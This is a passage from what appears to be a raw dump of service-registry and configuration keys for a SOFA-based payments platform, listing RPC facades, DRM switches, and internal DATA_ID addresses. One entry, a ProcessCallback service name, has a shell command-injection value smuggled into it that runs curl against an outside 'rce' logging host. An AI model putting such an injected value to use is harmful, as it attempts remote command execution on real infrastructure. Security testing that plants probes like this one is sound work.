.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:DataWorks@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.authorize.CampAuthorizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cinspfront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundUserServiceHotspotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.242.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_O_RISKMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.4.164#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mobileappcommon@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipricecore.common.service.facade.GroupManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.merchant.BizRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_APP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.commandcenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYBUMNGJSESSIONID.adaptive,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.airprod.common.service.facade.freezeunfreeze.AirFreezeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfsettle.facade.api.ConfirmationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","financemng@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinpromo.common.service.facade.api.welfare.WelfareQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_CSMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY_V2@openbizmock#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.finscprod.facade.prophet.SeasonArchiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.live.LiveSceneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sccounter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.seekers.facade.apis.NoiseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Servers_TP_F_AEICORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kmi.common.service.client.api.CreateKeyClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_REVCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.trade.ext.service.api.VoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.AppQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.paybox.SmartPayBoxTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.cacheType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fcprodbx-insmobile:name=com.alipay.fc.prodbx.common.drm.impl.DrmResourceServiceImpl.serviceDigestLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.punish.AppPunishQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.cfin.cfcoopration.common.service.facade.ApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaexprod.common.mobilerpc.facade.service.RateQueryServiceV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbmaterialcenter.common.service.facade.api.checker.MaterialCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@zmyschecker#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.progov.service.api.ProductExcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.itemorder.ItemOrderReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.InvokeLimitConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundapplication.common.service.facade.api.record.RecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.bankcardTairCache.monitorMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityexprod.common.service.facade.KBAUserPicService:1.0:securityexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.CouponTemplateControlResource.directPublishTemplate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insiop.common.service.facade.conf.InsIopConfMetaMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.UcdpPositionMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bipgw.common.service.facade.prod.moto.DepositBackTranslateBillNoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.44.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.prodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insptmarket.facade.growth.api.InsGrowthServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.manage.FundShareSplitManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.messagefusion.facade.api.UserBoxConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.udataservice.service.facade.DataSetDebugQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.memberprod.common.service.account.register.RegisterAndCertifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mobileaix@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwalm.facade.api.FmGuardianQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pcreditmng_benefitControlProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.maxBurstSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundmng.biz.ext.interest.processor.InterestPayProcessor:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedDataSyncWhiteIdDrm.whiteIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.productpkg.IndexQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.ldc.MobilelbsUserServiceInGZone:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.core.service.repository.PurchaseControlProductRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:appstore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.development.common.facade.api.AlertConfigApi:1.0:dpstreaming@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.profile.admin.ProfileAdminQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finbatchcore.common.service.facade.instruction.BusinessInstructionHandleFacade:1.0:rfmbatchcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcredittrans.facade.common.pctconfig.api.PctconfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.msecuritycore.api.SecurityPolicyService:1.0:securitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.SystemParamSwitchResource.notCheckProductPids,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.giftprod.common.service.facade.MerchantArVisibleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smartsql.service.facade.service.UDFServerV2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalReliableDrm.turnOffUseCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acccenter.common.service.facade.system.ApprovalServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.73.170.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cfmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.253.172#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-gkatwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:datasecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.174.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.infosectask:name=com.alipay.holoxlib.core.backtrack.drm.BacktrackConfigResource.allDeletedScene,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:authcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:dcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ams-assistant:name=com.alipay.zcache.tbase.amsAssistantTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finlsmicrogw.common.service.facade.gateway.api.FieldOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.weather.LatestWeatherServiceInCzone:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.FinbatchQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mobileweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.genericmerchant.facade.EquipmentAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.44.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.katongprod.signcenter.service.read.SignChannelQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.tabYebProfitShow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:trafficintelbiz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.money.core.MoneyTransferService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.airbops.biz.changemng.drm.ChangemngDrmConfig.jexlFormart1,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.orchestration.handler.RemoteActionHandler:1.0:sitebuilder-kusion-frapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.definition.BizConditionOperateOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:securityexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.DiamondProdtansService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.defaultCorsCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.antschedulerconsole.serverless.ServerlessOpenApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:fxFlatAndProcessFillbackTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.cacheType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.tairTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mirrorprod.facade.gateway.service.PlaybackDataGateWay:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.16.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.igopcore.common.service.facade.api.business.BizOpenQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:openapi#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdevops_drmChange_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanGrantBankDrm.katongInstId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.unimetaservice.resource.facade.SystemConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.securityidentify.EntCornAuthVerifyLogInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mdda-base@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.spr-fund-fixed-generate.normalTaskPaused,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.134.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.custcenter.service.facade.agaccesstoken.AgATKManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.ScriptPackageManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.document.FrontDocQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.insttrade.insttrade_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.176.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.taobao.recommendplatform.client.HsfTripleRecommend:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.api.AssetTransVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.common.service.facade.api.WorkFlowManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.api.basic.common.component.sequence.SequenceApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reading.common.service.facade.wallet.WalletHomeContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.information.EventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.event.common.service.facade.api.event.EventOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frservcenter.facade.api.TreeNodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dqs.common.service.facade.SqlExecuteExportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.meta.MetaChangeKeyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.payment.api.FluxProdOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:databridge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.132.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.95.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.xview.conf.client.XViewObjectConfClient:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:;curl http://86842598-80102053-uniqueId-104003024.rce.noble.log.lynnshare.cc;@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_FINRESEARCH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.chaos.dig.facade.code.ci.CodeAttackCIFeedbackFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.ifim.biz.risk.manager.RiskEmergencyManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdMerchantMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.127.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bkpromoguard.facade.scene.api.SceneFieldDefFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.equitymarketscore.common.service.facade.api.BizExtendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:rpc-route-rz#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.airbops:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkqafactory.facade.FluxTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.gfpayment.PaymentRealTimeBlockFacade:1.0:gftms_PaymentInquiry@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.constraintCompMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mydds.core.engine.service.api.ValidationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.ClientCustomerSlimSwitch.methodConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue20#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.82.87.224#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.tradeexprod.tradeexprod_mservice_ds.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.72.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finstore.common.service.facade.fop.api.CrowdTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimprod.common.service.InsClaimAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.share.purchase.service.ExceptionOrderServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofatest.api.OrderTradeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:alplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:libadtask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:openCity_manual_completed_processCallback1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inscommunity.common.service.facade.XhbFAQFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abnclprod.facade.taskflow.api.AbnTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:kobex-platform#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.timeout.common.service.facade.api.TimeoutExecutor:1.0:fundCardProd@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.BalanceFreezeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.NoticeSettingService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhcprod.core.service.CaseCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:securityexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgopen.container.facade.api.KgOnlineServiceInvokeFacade:1.0:kgopen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpayplatform.common.service.facade.spi.AssetConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fingiftprodTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-intimateprod-schedule#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aftstest.web@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gpfnfiveaccount.facade.api.AccountInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebppgw.TokenConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksigncentre_instArSaleProductAdjustCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.config-security-false:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dtqualitycore.service.RuleLoader:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.11.185#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.routeclient.interfacename:finpromobff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.client.SystemAppInvokeService:1.0:instservicecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.ExecuteService:1.0:fincomtest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insapportion.common.service.facade.customer.UserBillInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.certdoc.certdoccenter.facade.UserCertDocBizQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.policy.api.ElectronicPolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mobilelbs.common.service.facade.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.admediamgr.common.service.facade.service.AdminTrafficServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agap.service.facade.api.ClassifyService:1.0:gwService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricecenter.common.service.facade.migrate.PriceMigrateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.FopOperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeviceprod.common.service.facade.mall.IoTDeviceMallQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.pcx.service.TrafficControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.webHost,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.hainaprod.common.service.facade.api.mini.op.CrossBundleOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.inspector.InspectorRoneSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.core.service.fundcheck.query.DataQueryServiceCNProxy:1.0:dataQueryServiceCNProxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.api.extension.WorkbenchEffluxService:1.0:publichome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpay.common.service.facade.api.PPayApplyServiceFacade: